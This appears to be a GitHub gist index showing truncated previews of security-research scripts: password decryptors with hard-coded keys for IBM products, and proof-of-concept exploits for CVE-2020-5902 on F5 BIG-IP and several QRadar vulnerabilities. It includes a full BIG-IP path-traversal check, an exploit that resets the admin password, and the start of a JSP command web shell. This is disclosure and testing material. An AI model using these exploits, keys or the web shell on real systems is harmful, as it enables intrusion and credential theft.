
ykoster / cicdecrypt.py
Created Dec 24, 2020
IBM Installation Manager imcl / imutilsc encryptString command decrypt script
#!/usr/bin/env python3
import re
import sys
import base64
from Crypto.Cipher import AES
# Shape check for the ciphertext argument: canonical base64 only — groups of
# four alphabet characters with optional '=' / '==' padding at the end. The
# alphabet here is upper-case only; lower-case input matches only if the
# caller compiles this with re.IGNORECASE — NOTE(review): confirm in decrypt().
val = r'^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==|[A-Z0-9+/]{3}=)?$'

# Static 16-byte AES key, decoded once at import. It is hard-coded, so anything
# encrypted under it is only obfuscated — whoever has this script can recover
# the plaintext. Presumably the fixed key used by Installation Manager's
# encryptString; its provenance is not shown here.
key = base64.b64decode('BTQOll+YFPIcsB+vMfXNTg==')
def decrypt(e):
ykoster / ghcdecrypt.py
Created Dec 23, 2020
IBM Green Hat / Rational Integration Tester password decryptor
#!/usr/bin/env python3
import re
import sys
import array
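# Stored-password format: the literal prefix "#com.ghc.1!" followed by one or
# more hex digits. The dots are escaped so the prefix is matched literally —
# the unescaped pattern let '.' stand for any character, so strings such as
# "#comXghcX1!AB" were accepted as valid input. decrypt() compiles this with
# re.IGNORECASE, so lower-case hex digits are accepted as well.
val = r'^#com\.ghc\.1![0-9A-F]+$'

# Key material consumed by decrypt(): thirteen 16-bit words. Typecode 'H' is
# unsigned short, so each entry is stored as exactly two bytes.
key = array.array('H', (
    0x12FD, 0x4AAD, 0x4405, 0xE327, 0xA28A, 0x7211, 0x1111,
    0x5543, 0x0CDD, 0x6A31, 0x4080, 0x217E, 0x7E73,
))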
def decrypt(e):
p = re.compile(val, re.IGNORECASE)
ykoster / cve-2020-5902-tmsh.py
Created Jul 5, 2020
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3
import os
import requests
import urllib.parse
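# Target and the credential the exploit installs. Both can be supplied from
# the environment so the script does not have to be edited per run; the
# placeholder default keeps an unconfigured run from silently hitting a real
# host. WARNING: this PoC overwrites the admin user's password and shell on
# the target — use only against systems you are authorised to modify.
target = os.environ.get('TARGET', '<ip of target>')
base_url = f'https://{target}/'
# New admin password set by the exploit; change it per engagement rather than
# leaving a well-known value on the device.
password = os.environ.get('NEW_PASSWORD', 'B@ckd00r!')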
def check(base_url):
ykoster / cve-2020-5902-check.sh
Last active Jul 8, 2020
Bash one-liner to check whether a device is vulnerable to CVE-2020-5902
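#!/usr/bin/env bash
# Unauthenticated check for CVE-2020-5902 (F5 BIG-IP TMUI path traversal).
# The request goes through /tmui/login.jsp/..;/ to reach getTabSet.jsp without
# a session; if the tabId value is echoed back, the traversal worked and the
# device is vulnerable.
#
# Usage: cve-2020-5902-check.sh <host[:port]>
# Exit status: 0 = vulnerable, 1 = not vulnerable, 2 = probe failed.
#
# --insecure is required because BIG-IP ships a self-signed certificate, but it
# also means an on-path host could answer for the target; probe from a network
# position you trust. --max-time stops a filtered host from hanging the check.
target="${1:?usage: $0 <host[:port]>}"
marker='Vulnerable'
url="https://${target}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=${marker}"
reset=$'\033[0m'

# A failed curl (refused, timeout, DNS) produced an empty body and was reported
# as "Not Vulnerable"; treat it as a distinct outcome instead.
if ! body="$(curl --silent --insecure --max-time 15 "$url")"; then
    printf '\033[0;33mProbe failed (no response from %s)%s\n' "$target" "$reset"
    exit 2
fi

# The colour codes are reset after each verdict so the terminal is not left red/green.
if grep -q -- "$marker" <<<"$body"; then
    printf '\033[0;31mVulnerable%s\n' "$reset"
    exit 0
fi
printf '\033[0;32mNot Vulnerable%s\n' "$reset"
exit 1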
ykoster / qradar_deserialize.py
Created Apr 16, 2020
Proof of concept for Java deserialization vulnerability in QRadar RemoteJavaScript Servlet
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
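import os

# Connection settings for the PoC. Defaults target a local console with the
# default admin credentials; they can be overridden from the environment so
# the real password never has to be edited into (or committed with) the script.
base_url = os.environ.get('QRADAR_URL', 'https://127.0.0.1/')
username = os.environ.get('QRADAR_USER', 'admin')
password = os.environ.get('QRADAR_PASSWORD', 'initial')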
ykoster / qradar_session_deserialize.py
Created Apr 16, 2020
Proof of concept for QRadar session manager path traversal vulnerability
#!/usr/bin/env python3
import json
import base64
import random
import urllib3
import requests
import urllib.parse
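import os

# Connection settings for the PoC. The original used an f-string with no
# placeholders (a plain literal does the same); the values can now be
# overridden from the environment so the script does not need per-target edits.
base_url = os.environ.get('QRADAR_URL', 'https://127.0.0.1/')
username = os.environ.get('QRADAR_USER', 'admin')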
ykoster / qradar_php_lfi.py
Created Apr 16, 2020
Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept
#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict
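import os

# Connection settings for the PoC. Defaults target a local console with the
# default admin credentials; override via the environment rather than editing
# a password into the script. (The f-string had no placeholders; a plain
# literal is equivalent.)
base_url = os.environ.get('QRADAR_URL', 'https://127.0.0.1/')
username = os.environ.get('QRADAR_USER', 'admin')
password = os.environ.get('QRADAR_PASSWORD', 'initial')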
ykoster / pop_chain.php
Created Apr 16, 2020
PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept
<?php
include("/opt/ibm/forensics/html/includes/license.inc.php");
include("/opt/ibm/forensics/html/includes/simple_html_dom.php");
$jsp = <<<__EOF
<!DOCTYPE html>
<html>
<pre>
<%@page import="java.util.*,java.io.*"%>
<% if (request.getParameter("c") != null) {
ykoster / qradar_rss_ssrf.py
Created Apr 16, 2020
QRadar RssFeedItem Server-Side Request Forgery vulnerability (CVE-2020-4294) proof of concept
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
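import os

# Connection settings for the PoC. Defaults target a local console with the
# default admin credentials; they can be overridden from the environment so
# the real password never has to be edited into (or committed with) the script.
base_url = os.environ.get('QRADAR_URL', 'https://127.0.0.1/')
username = os.environ.get('QRADAR_USER', 'admin')
password = os.environ.get('QRADAR_PASSWORD', 'initial')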
ykoster / qradar_run-result-reader_lpe.sh
Created Apr 16, 2020
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
#!/bin/bash
# On Ctrl-C, put the original run-result-reader.sh back from the copy the PoC
# keeps in /tmp (see cleanup below). NOTE(review): only SIGINT is trapped; if
# the script can also end through an error or a normal exit before the file is
# restored, consider trapping EXIT too — the rest of the script is not shown here.
trap cleanup INT
function cleanup()
{
if [ -f /tmp/run-result-reader.sh ]
then
/usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
/usr/bin/rm -f /tmp/run-result-reader.sh
fi